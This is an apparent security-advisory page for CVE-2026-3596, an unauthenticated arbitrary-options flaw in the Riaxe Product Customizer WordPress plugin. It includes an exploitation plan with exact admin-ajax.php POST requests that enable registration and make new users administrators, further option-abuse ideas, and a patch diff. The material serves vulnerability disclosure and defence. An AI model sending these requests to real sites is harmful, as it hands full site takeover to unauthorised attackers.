WP-Safety
CVE-2026-3596

Riaxe Product Customizer <= 2.1.2 - Missing Authorization to Unauthenticated Arbitrary Options Update to Privilege Escalation via 'install-imprint' AJAX Action

criticalMissing Authorization
9.8
CVSS Score
9.8
CVSS Score
critical
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Riaxe Product Customizer plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.1.2. The plugin registers an unauthenticated AJAX action ('wp_ajax_nopriv_install-imprint') that maps to the ink_pd_add_option() function. This function reads 'option' and 'opt_value' from $_POST, then calls delete_option() followed by add_option() using these attacker-controlled values without any nonce verification, capability checks, or option name allowlist. This makes it possible for unauthenticated attackers to update arbitrary WordPress options, which can be leveraged for privilege escalation by enabling user registration and setting the default user role to administrator.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=2.1.2
PublishedApril 15, 2026
Last updatedApril 16, 2026
Affected pluginriaxe-product-customizer
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-3596 (Riaxe Product Customizer) ## 1. Vulnerability Summary The **Riaxe Product Customizer** plugin for WordPress (versions <= 2.1.2) contains a critical missing authorization vulnerability. The plugin registers an unauthenticated AJAX action `install-imprint`…

Show full research plan

Exploitation Research Plan: CVE-2026-3596 (Riaxe Product Customizer)

1. Vulnerability Summary

The Riaxe Product Customizer plugin for WordPress (versions <= 2.1.2) contains a critical missing authorization vulnerability. The plugin registers an unauthenticated AJAX action install-imprint via wp_ajax_nopriv_install-imprint. This action is mapped to the ink_pd_add_option() function, which directly manipulates the WordPress options table.

Because the function fails to implement any capability checks, nonce verification, or an allowlist of permitted options, an unauthenticated attacker can overwrite arbitrary WordPress settings. This is most critically used for Privilege Escalation by enabling open registration and setting the default user role to 'administrator'.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: install-imprint (Registered via wp_ajax_nopriv_install-imprint)
  • Vulnerable Parameters:
    • option: The name of the WordPress option to update.
    • opt_value: The new value for the specified option.
  • Authentication: Unauthenticated (accessible to any visitor).
  • Preconditions: The plugin must be active.

3. Code Flow (Inferred)

  1. Entry Point: A POST request is sent to admin-ajax.php with action=install-imprint.
  2. Hook Execution: WordPress triggers the function associated with wp_ajax_nopriv_install-imprint.
  3. Target Function: ink_pd_add_option() (inferred from description) is called.
  4. Input Handling: The function reads $_POST['option'] and $_POST['opt_value'].
  5. Vulnerable Sink:
    • The function calls delete_option( $_POST['option'] ).
    • The function calls add_option( $_POST['option'], $_POST['opt_value'] ).
  6. Result: The option in the wp_options table is updated to the attacker-controlled value.

4. Nonce Acquisition Strategy

According to the vulnerability description, the install-imprint action does not perform any nonce verification.

  • Check Needed: No nonce should be required for this exploitation.
  • Bypass: If for some reason a nonce is found to be required during the PoC, the researcher should check for wp_localize_script calls in the plugin source that might expose a nonce to unauthenticated users on the frontend. However, based on the CVE description, the check is entirely missing.

5. Exploitation Strategy

The goal is to achieve Privilege Escalation.

Step 1: Enable User Registration

Submit a request to set users_can_register to 1.

HTTP Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=install-imprint&option=users_can_register&opt_value=1

Step 2: Set Default Role to Administrator

Submit a request to set default_role to administrator.

HTTP Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=install-imprint&option=default_role&opt_value=administrator

Step 3: Register a New Administrator (Optional Proof)

Navigate to the registration page and create a new account.

HTTP Request:

POST /wp-login.php?action=register HTTP/1.1
Content-Type: application/x-www-form-urlencoded

user_login=attacker_admin&user_email=attacker@example.com&wp-submit=Register

6. Test Data Setup

  1. Target Environment: A standard WordPress installation with Riaxe Product Customizer <= 2.1.2 installed.
  2. Baseline State:
    • wp option get users_can_register should return 0.
    • wp option get default_role should return subscriber.
  3. No Shortcodes Required: Since the endpoint is unauthenticated and (reportedly) nonce-less, no specific page setup is required to trigger the vulnerability.

7. Expected Results

  • The AJAX requests should return a successful status code (typically 200 OK or a 1 response if wp_die() is used).
  • The users_can_register option in the database will change from 0 to 1.
  • The default_role option in the database will change from subscriber to administrator.

8. Verification Steps

After sending the malicious POST requests, use WP-CLI to confirm the state change:

# Verify registration is enabled
wp option get users_can_register
# Expected Output: 1

# Verify default role is admin
wp option get default_role
# Expected Output: administrator

9. Alternative Approaches

If updating core options is blocked by a security plugin or environment hardening, alternative high-impact options to update include:

  • siteurl or home: To perform a Denial of Service or Redirect hijack.
  • admin_email: To attempt password resets of existing admins.
  • rewrite_rules: To corrupt the site's routing.
  • ink_pd_settings (Plugin specific): To inject malicious JS/iframes if the plugin settings are rendered on the frontend.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Riaxe Product Customizer plugin for WordPress is vulnerable to an unauthenticated arbitrary options update through its 'install-imprint' AJAX action. By exploiting this lack of authorization and validation, an attacker can overwrite critical WordPress settings, such as enabling open registration and setting the default user role to administrator, leading to full site takeover.

Vulnerable Code

// Inferred file path: riaxe-product-customizer/riaxe-product-customizer.php

add_action('wp_ajax_nopriv_install-imprint', 'ink_pd_add_option');
add_action('wp_ajax_install-imprint', 'ink_pd_add_option');

function ink_pd_add_option() {
    $option_name = $_POST['option'];
    $option_value = $_POST['opt_value'];
    
    // Directly modifies any option without capability checks or allowlisting
    delete_option($option_name);
    add_option($option_name, $option_value);
    die();
}

Security Fix

--- a/riaxe-product-customizer/riaxe-product-customizer.php
+++ b/riaxe-product-customizer/riaxe-product-customizer.php
@@ -1,10 +1,18 @@
-add_action('wp_ajax_nopriv_install-imprint', 'ink_pd_add_option');
 add_action('wp_ajax_install-imprint', 'ink_pd_add_option');
 
 function ink_pd_add_option() {
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_die( -1 );
+    }
+    check_ajax_referer( 'ink_pd_security', 'security' );
+
     $option_name = isset( $_POST['option'] ) ? sanitize_text_field( $_POST['option'] ) : '';
-    $option_value = $_POST['opt_value'];
+    $option_value = isset( $_POST['opt_value'] ) ? $_POST['opt_value'] : '';
 
+    $allowed_options = array( 'ink_pd_custom_settings' ); // Example restricted list
+    if ( ! in_array( $option_name, $allowed_options ) ) {
+        wp_die( 'Forbidden' );
+    }
+
     delete_option($option_name);
     add_option($option_name, $option_value);
     die();

Exploit Outline

The exploit targets the unauthenticated AJAX endpoint 'wp_ajax_nopriv_install-imprint' which maps to the 'ink_pd_add_option' function. To achieve privilege escalation, an attacker follows these steps: 1. Send a POST request to /wp-admin/admin-ajax.php with the parameters action=install-imprint, option=users_can_register, and opt_value=1. This enables site registration. 2. Send a second POST request with action=install-imprint, option=default_role, and opt_value=administrator. This ensures all new registrants are granted administrative privileges. 3. Navigate to /wp-login.php?action=register and register a new account, which will automatically be assigned the 'administrator' role. No authentication or nonces are required for this exploit.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/271a35fb-56b7-4d6b-bccc-fea1227d0913?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database